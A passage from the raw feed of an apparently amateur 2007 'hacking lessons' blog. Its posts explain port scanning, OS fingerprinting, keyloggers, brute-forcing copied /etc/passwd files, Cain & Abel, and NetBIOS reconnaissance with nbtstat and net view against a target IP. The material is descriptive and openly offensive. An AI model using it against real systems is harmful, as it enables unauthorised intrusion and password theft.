style="font-family:Arial;"&gt;80&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="padding: 0.75pt;" valign="top"&gt;&lt;p class="table-para" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;Post Office Protocol, version 3 (POP3)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;/td&gt;&lt;td style="padding: 0.75pt;" valign="top"&gt;&lt;p class="table-para" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;110&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;p class="para" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="para" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="para" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="para" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="para" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="first-para" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="first-para" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="first-para" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;To attack a computer, you need the target computers IP address. There are lots of software’s available on net for this purpose one way is by looking up for the domain name on the Network Solutions website. Once you know a computer's IP address, the next step is to find which ports are open in order to access the target computer.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="para" style="text-align: justify;"&gt;&lt;a name="337"&gt;&lt;/a&gt;&lt;a name="ch11fig04"&gt;&lt;/a&gt;&lt;span class="figuremediaobject"&gt;&lt;span style="font-family:Arial;"&gt;Ways to check which port is open-----&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="para" style="text-align: justify;"&gt;&lt;b&gt;&lt;span style="font-family:Arial;"&gt;TCP connect scanning&lt;/span&gt;&lt;/b&gt;&lt;span style="font-family:Arial;"&gt; – Hacker sends a SYN packet to the target computer and waits for a return acknowledgment packet (SYN/ACK), and then sends another acknowledgment packet (ACK) to connect. This type of scanning is easily recognized by target computers to alert them of a possible hacker attack.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="para" style="text-align: justify;"&gt;&lt;b&gt;&lt;span style="font-family:Arial;"&gt;TCP SYN scanning – &lt;/span&gt;&lt;/b&gt;&lt;span style="font-family:Arial;"&gt;Same as above but when the acknowledgement is received the hacker does not sent back the ACK packet to connect&lt;/span&gt;&lt;a name="338"&gt;&lt;/a&gt;&lt;a name="page141"&gt;&lt;/a&gt;&lt;span style="font-family:Arial;"&gt;. By doing this the hacker knows that the port is listening and hence open. This technique has less chances of getting detected.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="para" style="text-align: justify;"&gt;&lt;b&gt;&lt;span style="font-family:Arial;"&gt;TCP FIN scanning – &lt;/span&gt;&lt;/b&gt;&lt;span style="font-family:Arial;"&gt;Hacker sends a &lt;/span&gt;&lt;span style="font-family:Arial;"&gt;"No more data from sender" (FIN) packet to a port. A closed port responds with a Reset (RST) message, while an open port simply ignores the FIN packet.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="first-para" style="text-align: justify;"&gt;&lt;a name="339"&gt;&lt;/a&gt;&lt;a name="ch11lev2sec3"&gt;&lt;/a&gt;&lt;span style="font-family:Arial;"&gt;The next task is to find the target computer’s operating system in order to know the commands for guessing the computer's password.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="first-para" style="margin-left: 0.5in; text-indent: -0.25in; text-align: justify;"&gt;&lt;&lt;b&gt;&lt;span style="font-family:Arial;"&gt;FIN probing&lt;/span&gt;&lt;/b&gt;&lt;span style="font-family:Arial;"&gt;: Hacker sends a FIN ("No more data from sender") packet to a port and waits for a response. Windows responds with RST (Reset) messages&lt;a name="340"&gt;&lt;/a&gt;&lt;a name="page142"&gt;&lt;/a&gt;.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="first-para" style="margin-left: 0.5in; text-indent: -0.25in; text-align: justify;"&gt;&lt;&lt;b&gt;&lt;span style="font-family:Arial;"&gt;FIN/SYN probing&lt;/span&gt;&lt;/b&gt;&lt;span style="font-family:Arial;"&gt;: Hacker sends a FIN/SYN packet to a port and waits for a response. Linux systems respond with a FIN/SYN/ACK packet.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="first-para" style="margin-left: 0.5in; text-indent: -0.25in; text-align: justify;"&gt;&lt;&lt;b&gt;&lt;span style="font-family:Arial;"&gt;ICMP message quoting&lt;/span&gt;&lt;/b&gt;&lt;span style="font-family:Arial;"&gt;: Hacker sends data to a closed port and waits to receive an error message. All computers send back the initial IP header of the data with an additional eight bytes tacked on. Solaris and Linux systems, however, return more than eight bytes.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;Once a hacker knows the IP address, the open ports available, and the type of operating system for a target computer, the hacker can plan his strategy for breaking into the computer.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4387334260922717220-4836893027781761574?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/4836893027781761574/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4387334260922717220&amp;postID=4836893027781761574' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/4836893027781761574'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/4836893027781761574'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2007/04/port-scanning.html' title='PORT SCANNING (Lesson 5)'/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-5761352059994773716</id><published>2007-04-03T13:40:00.000+05:30</published><updated>2007-05-07T14:58:21.306+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Career'/><title type='text'>COMPANIES &amp; PLACEMENT CONSULTANTS</title><content type='html'>&lt;span style="font-weight: bold;font-size:130%;" &gt;Get the database of companies and placement consultants all over INDIA with contact email - id's.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(255, 0, 0);"&gt;Leave your email in the comments field or send a mail to hackinme@gmail.com &gt;&gt;&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255); font-weight: bold; font-style: italic;"&gt;Regards&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255); font-weight: bold; font-style: italic;"&gt;$   &lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4387334260922717220-5761352059994773716?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/5761352059994773716/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4387334260922717220&amp;postID=5761352059994773716' title='28 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/5761352059994773716'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/5761352059994773716'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2007/04/companies-placement-consultants.html' title='COMPANIES &amp; PLACEMENT CONSULTANTS'/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>28</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-240809259814343119</id><published>2007-04-02T21:21:00.000+05:30</published><updated>2007-05-06T21:55:49.254+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Breaking Security'/><title type='text'>IMPORTANT TOOLS FOR SECURITY BREACHING (Lesson 6)</title><content type='html'>&lt;p class="para" style="text-align: justify;"&gt;&lt;b style=""&gt;&lt;span style="font-family:Arial;"&gt;First Step&lt;/span&gt;&lt;/b&gt;&lt;span style="font-family:Arial;"&gt; – Finding a computer to attack&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="para" style="text-align: justify;"&gt;&lt;b style=""&gt;&lt;span style="font-family:Arial;"&gt;Second Step&lt;/span&gt;&lt;/b&gt;&lt;span style="font-family:Arial;"&gt; – Breaking into it&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="para" style="text-align: justify;"&gt;&lt;b style=""&gt;&lt;span style="font-family:Arial;"&gt;Third Step&lt;/span&gt;&lt;/b&gt;&lt;span style="font-family:Arial;"&gt; – Crack the password&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="para" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;A hacker can find the password in the following ways:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;h3 style="text-align: justify;"&gt;&lt;a name="358"&gt;&lt;/a&gt;&lt;a name="ch12lev2sec3"&gt;&lt;/a&gt;&lt;span style=";font-family:Arial;font-size:12;"  &gt;&lt;span style="font-size:100%;"&gt;1).&lt;u&gt;Keystroke Logger-&lt;/u&gt;&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/h3&gt;  &lt;p class="first-para" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;A Keystroke Logger can record&lt;/span&gt;&lt;span style="font-family:Arial;"&gt; each and everything a person types. A logger can either send the recording to a monitoring computer or saves it to a file in the same computer. The key logger run’s in &lt;span style=""&gt;hidden mode i.e. &lt;/span&gt;they hide their presence from the user, although a professional person can check their existence in the computer system.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="para" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;When the user leaves the target computer, the hacker can recover the log file in which every entry is recorded be it an email id username, password, credit card number, etc. Some key loggers can even mail the log file to the hacker so that they can monitor the target’s activity from another location.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="para" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;For using a key logger the hacker must have access to target computer system on a regular basis.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;h4 style="text-align: justify;"&gt;&lt;u&gt;&lt;span style=";font-family:Arial;font-size:12;"  &gt;&lt;span style="font-size:100%;"&gt;2).Desktop-Monitoring Programs-&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/h4&gt;  &lt;p class="first-para" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;If the hacker doesn’t have access to the target computer on a regular basis then a desktop monitoring program is the solution. If the hacker is successful in installing this program on the target computer, then, whatever the user types on the target computer will appear on the hacker’s computer screen.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;h3 style="text-align: justify;"&gt;&lt;a name="368"&gt;&lt;/a&gt;&lt;a name="ch12lev2sec4"&gt;&lt;/a&gt;&lt;a name="371"&gt;&lt;/a&gt;&lt;a name="ch12lev2sec5"&gt;&lt;/a&gt;&lt;u&gt;&lt;span style=";font-family:Arial;font-size:12;"  &gt;&lt;span style="font-size:100%;"&gt;3). Brute-Force Attack-&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/h3&gt;  &lt;p class="para" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;The brute-force method simply tries every possible combination of alphabets, (small + caps), special characters and numbers of varying lengths. However, this method can take days to crack a password.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="para" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;Brute-force attacks are very much successful in cracking Windows 98 and UNIX passwords. In windows 98 the user name and password is stored in the windows/*.pwl files whereas most of UNIX systems store the list of account names and passwords in the /etc/passwd file.&lt;span style=""&gt;  &lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="para" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;To gain access to the target computer the hackers simply copy the /etc/passwd file or the *.pwl file to their own computer so that they can run a brute-force attack on that file at their convenience, without any risk.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4387334260922717220-240809259814343119?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/240809259814343119/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4387334260922717220&amp;postID=240809259814343119' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/240809259814343119'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/240809259814343119'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2007/04/immportant-tools-for-security-breaching.html' title='IMPORTANT TOOLS FOR SECURITY BREACHING (Lesson 6)'/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-2820498041015181927</id><published>2007-04-02T21:16:00.000+05:30</published><updated>2007-04-26T15:24:55.849+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tool of the day'/><title type='text'>CAIN &amp; ABEL</title><content type='html'>&lt;p style="text-align: justify;"&gt;My favorite password cracking tool.&lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt;&lt;span style="font-weight: bold; color: rgb(51, 51, 255);"&gt;Cain &amp;amp; Abel&lt;/span&gt; is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols.&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4387334260922717220-2820498041015181927?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/2820498041015181927/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4387334260922717220&amp;postID=2820498041015181927' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/2820498041015181927'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/2820498041015181927'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2007/04/security-hackingtool-of-day-2nd-april.html' title='CAIN &amp; ABEL'/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-3075998177687971290</id><published>2007-04-02T21:00:00.000+05:30</published><updated>2007-05-16T22:12:20.480+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Breaking Security'/><title type='text'>HACKING LESSON 12</title><content type='html'>&lt;span style="color: rgb(153, 0, 0);font-size:130%;" &gt;&lt;span style="font-weight: bold;"&gt;A Basic Approach - Attacking a Remote Computer&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family:Arial;"&gt;&lt;br /&gt;In this lesson we will try to explain the following topics------&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;b style=""&gt;&lt;span style="font-family:Arial;"&gt;1).Basic commands through which the hackers get into your system.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;b style=""&gt;&lt;span style="font-family:Arial;"&gt;2).The necessary tools used for this purpose.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;b style=""&gt;&lt;span style="font-family:Arial;"&gt;3).Some tips and tricks.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;b style=""&gt;&lt;span style="font-family:Arial;"&gt;4).A little description about Trojans, etc…&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;We will also try to explain how to catch someone who is trying to get into your system…..&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;Let us first start with the commands…..&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;b style=""&gt;&lt;u&gt;&lt;span style="font-family:Arial;"&gt;1).NETBIOS &lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style="font-family:Arial;"&gt;- NetBIOS (Network Basic Input/Output System) is a program that allows applications on different computers to communicate within a local area network (&lt;a href="http://searchnetworking.techtarget.com/sDefinition/0,,sid7_gci212495,00.html"&gt;&lt;span style="text-decoration: none; color: rgb(0, 0, 0);"&gt;LAN&lt;/span&gt;&lt;/a&gt;).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;NetBIOS provides two communication modes: session or datagram. Session mode lets two computers establish a connection for a "conversation," allows larger messages to be handled, and provides error detection and recovery. Datagram mode is "connectionless" (each message is sent independently), messages must be smaller, and the application is responsible for error detection and recovery. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="text-align: justify;"&gt;&lt;b style=""&gt;&lt;u&gt;&lt;span style="font-family:Arial;"&gt;2).NBTSTAT&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style="font-family:Arial;"&gt; - Nbtstat is designed to help troubleshoot NetBIOS name resolution problems. When a network is functioning normally, NetBIOS over TCP/IP (NetBT) resolves NetBIOS names to IP addresses. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;The &lt;b&gt;nbtstat&lt;/b&gt; command removes and corrects preloaded entries using a number of case-sensitive switches. The &lt;b&gt;nbtstat&lt;i&gt; -&lt;/i&gt; a&lt;i&gt; &lt;&lt;/i&gt;&lt;/b&gt;&lt;i&gt;name&lt;b&gt;&gt;&lt;/b&gt;&lt;/i&gt; command performs a NetBIOS adapter status command on the computer name specified by &lt; &lt;i&gt;name&gt;&lt;/i&gt; . The adapter status command returns the local NetBIOS name table for that computer as well as the MAC address of the adapter card. The &lt;b&gt;nbtstat -A &lt;/b&gt;&lt; &lt;i&gt;IP address&lt;/i&gt; &gt; command performs the same function using a target IP address rather than a name.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="text-align: justify;"&gt;&lt;b style=""&gt;&lt;u&gt;&lt;span style="font-family:Arial;"&gt;3).NET VIEW&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style="font-family:Arial;"&gt; - The NET VIEW command displays a list of computers in the specified workgroup, or shared resources available on the specified computer.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="text-align: justify;"&gt;&lt;b style=""&gt;&lt;u&gt;&lt;span style="font-family:Arial;"&gt;4).NET USE&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style="font-family:Arial;"&gt; - Connects a computer to or disconnects a computer from a shared resource, or displays information about computer connections.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="text-align: justify;"&gt;&lt;b style=""&gt;&lt;u&gt;&lt;span style="font-family:Arial;"&gt;5).NETSTAT&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style="font-family:Arial;"&gt; - &lt;b&gt;Netstat&lt;/b&gt; provides statistics for the following:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;ul type="disc"&gt;&lt;li class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:Arial;color:blue;"  &gt;Proto&lt;/span&gt;&lt;span style="font-family:Arial;"&gt; - The name of the protocol ((&lt;a href="http://en.wikipedia.org/wiki/Transmission_Control_Protocol" title="Transmission Control Protocol"&gt;&lt;span style="text-decoration: none; color: rgb(0, 0, 0);"&gt;TCP&lt;/span&gt;&lt;/a&gt; or &lt;a href="http://en.wikipedia.org/wiki/User_Datagram_Protocol" title="User Datagram Protocol"&gt;&lt;span style="text-decoration: none; color: rgb(0, 0, 0);"&gt;UDP&lt;/span&gt;&lt;/a&gt;).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;  &lt;ul type="disc"&gt;&lt;li class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:Arial;color:blue;"  &gt;Local Address&lt;/span&gt;&lt;span style="font-family:Arial;"&gt; - The &lt;a href="http://en.wikipedia.org/wiki/Internet_Protocol" title="Internet Protocol"&gt;&lt;span style="text-decoration: none; color: rgb(0, 0, 0);"&gt;IP&lt;/span&gt;&lt;/a&gt; address of the local computer and      the port number being used. The name of the local computer that      corresponds to the &lt;a href="http://en.wikipedia.org/wiki/Internet_Protocol" title="Internet Protocol"&gt;&lt;span style="text-decoration: none; color: rgb(0, 0, 0);"&gt;IP&lt;/span&gt;&lt;/a&gt; address and the name of the port      is shown unless the &lt;b&gt;-n&lt;/b&gt; parameter is specified. If the port is not      yet established, the port number is shown as an asterisk (*).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;  &lt;ul type="disc"&gt;&lt;li class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:Arial;color:blue;"  &gt;Foreign Address&lt;/span&gt;&lt;span style="font-family:Arial;"&gt; - The &lt;a href="http://en.wikipedia.org/wiki/Internet_Protocol" title="Internet Protocol"&gt;&lt;span style="text-decoration: none; color: rgb(0, 0, 0);"&gt;IP&lt;/span&gt;&lt;/a&gt; address and port number of the      remote computer to which the socket is connected. The names that      corresponds to the &lt;a href="http://en.wikipedia.org/wiki/Internet_Protocol" title="Internet Protocol"&gt;&lt;span style="text-decoration: none; color: rgb(0, 0, 0);"&gt;IP&lt;/span&gt;&lt;/a&gt; address and the port are shown      unless the &lt;b&gt;-n&lt;/b&gt; parameter is specified. If the port is not yet      established, the port number is shown as an asterisk (*).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;  &lt;ul type="disc"&gt;&lt;li class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:Arial;color:blue;"  &gt;State&lt;/span&gt;&lt;span style="font-family:Arial;"&gt; - Indicates the state of a &lt;a href="http://en.wikipedia.org/wiki/Transmission_Control_Protocol" title="Transmission Control Protocol"&gt;&lt;span style="text-decoration: none; color: rgb(0, 0, 0);"&gt;TCP&lt;/span&gt;&lt;/a&gt; connection. The      possible states are as follows: CLOSE_WAIT, CLOSED, ESTABLISHED,      FIN_WAIT_1, FIN_WAIT_2, LAST_ACK, LISTEN, SYN_RECEIVED, SYN_SEND, and      TIME_WAIT. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;  &lt;p style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;For all these commands you need to have the IP address of the target computer. Also, you can try all these commands on your own IP address.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="text-align: justify;"&gt;&lt;b style=""&gt;&lt;u&gt;&lt;span style=";font-family:Arial;color:blue;"  &gt;Let’s see how NBTSTAT works---&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;Open command prompt and type &lt;b style=""&gt;NBTSTAT&lt;/b&gt; /?, this will show the help for using this command (&lt;b style=""&gt;&lt;u&gt;Note: &lt;/u&gt;&lt;/b&gt;/? Applies for all other commands also)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;If I have the ip address xxx.xxx.xx.x&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="text-align: justify;"&gt;&lt;b style=""&gt;&lt;span style="font-family:Arial;"&gt;nbtstat –A xxx.xxx.xx.x&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;This will give the NetBIOS Remote Machine Name Table.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;In front of every name you will see some numbers written like this &lt;20&gt;, &lt;03&gt;….These numbers tells the status of the remote computer. &lt;20&gt; signifies that the target computer’s file and printer sharing is on.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;Once we have this information the next step is to use the command &lt;b style=""&gt;net view&lt;/b&gt;……..&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;b style=""&gt;&lt;span style="font-family:Arial;"&gt;Net view &lt;a href="file://///xxx.xxx.xx.x"&gt;\\xxx.xxx.xx.x&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;b style=""&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style="font-family:Arial;"&gt;This will give the name of shared resources, like My Documents, Temp folder, etc…&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span 